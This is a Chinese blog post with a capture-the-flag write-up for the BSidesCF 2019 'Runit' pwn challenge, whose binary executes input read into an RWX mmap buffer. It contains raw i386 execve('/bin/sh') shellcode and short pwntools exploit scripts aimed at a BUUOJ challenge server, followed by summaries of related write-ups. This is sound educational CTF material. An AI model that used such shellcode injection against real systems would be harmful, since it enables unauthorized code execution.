[BSidesCF 2019]Runit

最新推荐文章于 2025-12-03 13:28:35 发布
原创 最新推荐文章于 2025-12-03 13:28:35 发布 · 114 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文分析了一个32位Runit程序,具有部分RELRO保护和NX功能,展示了如何利用mmap和shellcode进行内存写入并执行,以实现漏洞利用。作者使用pwn和Yapack库进行环境设置和攻击。

[BSidesCF 2019]Runit

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

32位,只开了nx

int __cdecl main(int argc, const char **argv, const char **envp)
{
  void *buf; // [esp+8h] [ebp-10h]

  buf = mmap(0, 0x400u, 7, 34, 0, 0);
  alarm(0xAu);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 2, 0);
  puts("Send me stuff!!");
  if ( read(0, buf, 0x400u) < 0 )
  {
    puts("Error reading!");
    exit(1);
  }
  ((void (*)(void))buf)();
  return 0;
}

buf开辟了7权限

然后最后还执行了buf

(又水一题x

from pwn import*
from Yapack import *

context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",26129,"./pwn",10)

sl(b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80')

ia()

在这里插入图片描述

Warning: to view this Streamlit app on a browser, run it with the following command 解决方案
weixin_43178406的博客
09-09 4万+
本文主要介绍了Warning: to view this Streamlit app on a browser, run it with the following command 解决方案,希望能对使用Streamlit的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
idea如何开启Run DashBoard,基于idea 2019.3
诺浅的专栏
04-21 3198
缘起 在idea里面如果需要启动多个项目的话,尤其是是比如微服务项目,动辄要启动五六个七八个应用,如果通过右上角那边启动会很不方便,你需要选择一个再启动一个 那么如果使用Idea的Run DashBoard,即可一览全局,方便项目重新配置、Run、Debug,简化了我们的操作步骤。 Run DashBoard面板如何开启 可以通过点击如下位置开启这个面板 但是有时候你可能没有Services...
BUUCTF(pwn)[BSidesCF 2019]Runit
半岛铁盒的博客
04-12 298
from pwn import * p=remote("node3.buuoj.cn",25145) context.arch="i386" shellcode=asm(shellcraft.sh()) p.sendline(shellcode) p.interactive()
BUUCTF pwn Runit&&RunitPlusPlus
热门推荐
stareforever的博客
01-13 1万+
[BSidesCF 2019]Runit 查看保护 IDA查看程序流 读入buf并执行,那么可以写入shellcode 完整ex from pwn import * context(log_level='debug') #io=process("./runit") io=remote("node3.buuoj.cn",28430) io.recv() payload=asm(shellcraft.sh()) io.send(payload) io.interactive() [BSid
buuoj Pwn writeup 241-245
yongbaoii的博客
08-31 423
241 [GKCTF 2021]checkin 逻辑也比较简单。 首先输入密码的时候可以有个溢出,但是只能溢出八个字节,就只能是做一个栈迁移。 然后有个检查,首先你的名字需要是admin,然后你的密码要走一个函数。 我们去看看那个函数。 好像很复杂。 0x4007f6那个函数点开。 瞬间明白是一个md5. 所以逻辑很简单,我们输入的密码通过md5加密之后要跟v4吻合。 我们发现密码admin的md5加密结果是那个。 所以就直接栈迁移就行。 栈迁移呢需要我们在bss上写东西,输入用户名可以做到,然后呢还
[BUUCTF]PWN——[BSidesCF 2019]Runit(mmap+shellcode)
mcmuyanga的博客
04-12 668
[BSidesCF 2019]Runit 例行检查,32位程序,开启了nx保护 运行一下看看大概的情况 ida载入 虽然开了nx,但是buf用mmap映射了地址,可读可写可执行,直接传入shellcode,15行调用了buf,运行shellcode获取shell。 exp from pwn import * p=remote("node3.buuoj.cn",25055) context.arch="i386" shellcode=asm(shellcraft.sh()) p.sendlin
服务管理工具 Runit 和 Systemctl
极地星辰
07-26 1224
RunitRunit是一种类Unix操作系统的init方案,可在Linux、Mac OS X、*BSD和Solaris操作系统上运行。它是daemontools的“再实现”,旨在提供一种轻量级、可靠且简单的服务管理工具。Systemctl:Systemctl是systemd的命令行工具,用于管理systemd服务。Systemd是现代Linux系统中的一个标准进程管理和初始化系统,旨在替代传统的SysV init系统。
MavenRunHelper 各版本集合
05-11
使用maven管理依赖包时...MavenRunHelper插件作为解决冲突的利器,能够高效率的展示出冲突列表,快速解决冲突问题。由于网络等问题,常常无法下载插件。现提供IntelliI IDEA 2019.3+,2018.3+,2017.2+各版本的插件集合。
容器逃逸Docker runc(CVE-2019-5736)漏洞复现与分析
SHELLCODE_8BIT的博客
08-08 1350
【代码】Docker runc(cve-2019-5736)漏洞复现与分析。
[BUUCTF]PWN——[BSidesCF 2019]Runit
BangSen1的博客
04-26 518
[BSidesCF 2019]Runit 例行检查 ,32位,开启NX保护 运行一下。 IDA打开,查看主函数。 buf用mmap映射了地址,可读可写可执行,直接传入shellcode,15行调用了buf,运行shellcode获取shell。 from pwn import * p=remote("node3.buuoj.cn",26059) context.arch="i386" shellcode=asm(shellcraft.sh()) p.sendline(shellcode) p.
buuoj Pwn writeup 141-145
yongbaoii的博客
05-28 278
141 jarvisoj_level6_x64 保护 142 suctf_2018_stack 保护 直接栈溢出到system就行。要注意ubuntu18,有个栈对齐。 from pwn import * r = remote('node3.buuoj.cn',28430) leave_ret = 0x400732 pop_rdi_ret = 0x4007a3 ret_addr = 0x0400677 payload = 'a' * (0x20 + 8) + p64(ret_addr) r.send
BUUCTF pwn wp 116 - 120
fa1c4的blog
03-06 491
[BSidesCF 2019]Runit [BSidesCF 2019]Runit$ file runit;checksec runit runit: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=fdd5061644dc69c2e4f2a0e98091901b4
BSidesSF 2019 部分writeup
Kr的博客
03-06 2592
forensics: table-tennis 给了一个流量包,使用wireshark打开,通过查找字符串和跟踪TCP数据流并没有发现什么,以我的水平,基本上到这里就结束了。 后面查看了其他人写的writeup,跟着复现了一下。 这个流量包中除了大量的加密的TLS和TCP数据流,还有一些ICMP数据包,发现里面有HTML数据。 这里要将这些HTML数据提取出来,照着大佬使用pyt...
[BSidesSF 2019]Mixer ECB加密
a3320315的博客
02-15 1666
题目介绍 这儿需要我们登录,根据题目提示,我们需用admin登录就能拿到flag,我们先随便登录一下试试~~ 这儿返回了cookie,应该是某种加密~~ 但是题目并没有提示,尝试解码也并没有特别明显的线索,后来随便改一下user的值,发现报错,并且返回我们这儿猜测是cbc加密,因为其它的我也不知道 根据题目我们知道,解码应该为 {"first_name":"ma","last_name":"jia...
BUUCTF:[BSidesCF 2019]Kookie
末初 · mochu7
03-30 2362
BUUCTF:[BSidesCF 2019]Kookie 提示我们使用admin账户登录,并且存在cookie/monster两个账户? 抓包添加Cookie: username=admin即可得到flag
2019年CTF3月比赛记录(一):BSidesSF 2019 CTF_Web部分题目writeup与重解
極品━═☆宏的博客
03-07 4275
2019年CTF比赛记录(一) 为了更好地学习CTF方面的相关知识,本着以赛促学的目的,决定自己报名参加一些2019年的CTF比赛,在比赛中去学其他的知识,帮助自己更好的学习Web方面的知识。限于个人能力有限,而且在时间上的限制,比赛中仅对自己当时看到的题目和解出的题目进行了解答。 比赛:BSidesSF 2019 CTF 时间:2019年3月4日至2019年3月5日 ...
冬季安全用电监测案例
最新发布
Jima_的博客
12-03 656
本文介绍了一套针对工厂宿舍用电安全的智能监测系统。系统通过安装DAM-E3501NT采集模块,实时监测各宿舍的用电参数和环境温度,并通过以太网将数据传输至主控室。系统具备高精度测量(0.2%)、过载预警、阈值自动告警等功能,当检测到异常用电(如持续1小时功率>3kW)时可自动报警。该系统采用"感知-分析-预警-控制"的闭环架构,实现从被动防范到主动监测的转变,适用于工厂、教育机构等多种场所的用电安全管理。
凌科芯安LKT6850安全MCU的技术特性与多领域应用
这里是数字化与人工智能的 “实验场” 与 “瞭望台”
12-02 813
凌科芯安LKT6850是一款基于ARM Cortex-M0内核的高安全性MCU,集硬件级加密、低功耗与丰富外设于一体。其核心优势包括:三层安全防护机制(硬件加密引擎、物理攻击防护、运行监控)、48MHz主频处理器、64KB加密存储及多通信接口。在智能家居、工业物联网和金融终端领域表现突出,如智能门锁的防破解设计、工业传感器的加密数据传输及POS机的合规交易保护。开发支持Keil/IAR工具链,提供完整驱动库,显著降低硬件成本20%-30%,满足国密算法要求,缩短开发周期至1-2个月,是中小规模安全控制场景的
RunItAs:简化软件在不同权限下运行流程
在这种情况下,"RunItAs"这款软件应运而生,它是一款为了解决上述问题而设计的实用工具。RunItAs的目的是允许普通用户以管理员权限运行软件,而不必给该用户赋予管理员账户的全部权限。这样既保证了系统安全,也满足...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值